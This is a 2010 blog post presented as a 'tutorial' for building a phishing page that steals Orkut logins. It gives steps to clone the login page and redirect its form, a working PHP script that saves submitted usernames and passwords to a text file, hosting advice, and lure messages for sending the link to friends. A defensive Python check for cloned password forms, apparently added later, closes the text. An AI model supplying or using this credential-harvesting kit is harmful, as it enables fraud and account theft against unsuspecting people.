Thursday, February 4, 2010

Phishing

Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies.

Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

This post is meant for tutorial purposes only. It is 100% working; please don't misuse it. Here we take the example of getting the login details of Orkut.

USE IT AT YOUR OWN RISK

First of all you need to find a webhost that supports PHP. I suggest Ripway to upload the required files.

Now, you need to create three files:

  1. Fake Orkut Page.

  2. A PHP file that steals the user details.

  3. A Text file to store user details.

Making fake page:

  1. Go to http://www.orkut.com/. A login page will appear.

  2. Press Ctrl+S to save the page. Save page as Login.html.

  3. Now open the saved page using a text editor to edit its source.

  4. Search for action= there. You will find action=https://www.google.com/accounts/ServiceLoginAuth?service=orkut

  5. Replace above line as action=details.php

  6. Save the page by pressing Ctrl+S. Your Fake page is created.

Creating PHP Details Stealer File:

  1. Open notepad and type the following code

<?php

header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=orkut ');

$handle = fopen("logindata.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>

  2. Now save the code as details.php

Details Storing Text File:

  1. Make a blank logindata.txt file.

Now you are almost done. You have to upload these three files onto a free hosting site like Ripway.

When you upload these files on Ripway, your fake page link looks like http://h1.ripway.com/ripwayaccount/Login.html. Post this link to your friends with text like "Click Here to get Orkut Plus version", "Orkut 2010 version", etc. When the victim tries to log in to the account using your link and presses the Sign In button, his login details will be stored in logindata.txt and you can see them on your webhost.

Warning:

Phishing is an illegal activity. Please don't misuse or distribute your phisher page's link. Also delete those files from the webhost.
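Seen from the defender's side, the rewritten action= attribute is the detectable tell: the cloned page still looks like the real login form, but its password form now posts to the host serving the page. The check below is an added example, not part of the original post. The trusted-host list, the host.example URL used in testing and the input field names are assumptions or constructed samples.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumption: hosts that may legitimately receive this brand's credentials.
TRUSTED_LOGIN_HOSTS = {"www.google.com"}

class FormScanner(HTMLParser):
    """Records the action of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self.in_form = False
        self.action = ""
        self.has_password = False
        self.password_form_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form, self.has_password = True, False
            self.action = a.get("action") or ""
        elif tag == "input" and self.in_form:
            if (a.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.has_password:
                self.password_form_actions.append(self.action)
            self.in_form = False

def suspicious_login_forms(page_url, html, trusted=TRUSTED_LOGIN_HOSTS):
    """Return resolved targets of password forms that post to an untrusted place."""
    scanner = FormScanner()
    scanner.feed(html + "</form>")  # flush a form left unclosed by sloppy markup
    scanner.close()
    findings = []
    for action in scanner.password_form_actions:
        target = urlsplit(urljoin(page_url, action))  # relative action -> page's host
        if target.scheme != "https" or target.hostname not in trusted:
            findings.append(target.geturl())
    return findings

# Constructed sample markup (field names are illustrative).
GENUINE = ('<form method="post" action="https://www.google.com/accounts/'
           'ServiceLoginAuth?service=orkut"><input name="Email">'
           '<input type="password" name="Passwd"></form>')
CLONED = GENUINE.replace(
    "https://www.google.com/accounts/ServiceLoginAuth?service=orkut", "details.php")
```

A mail gateway, proxy or crawler can run such a check on fetched pages and flag any page whose password form resolves to a non-HTTPS or untrusted target.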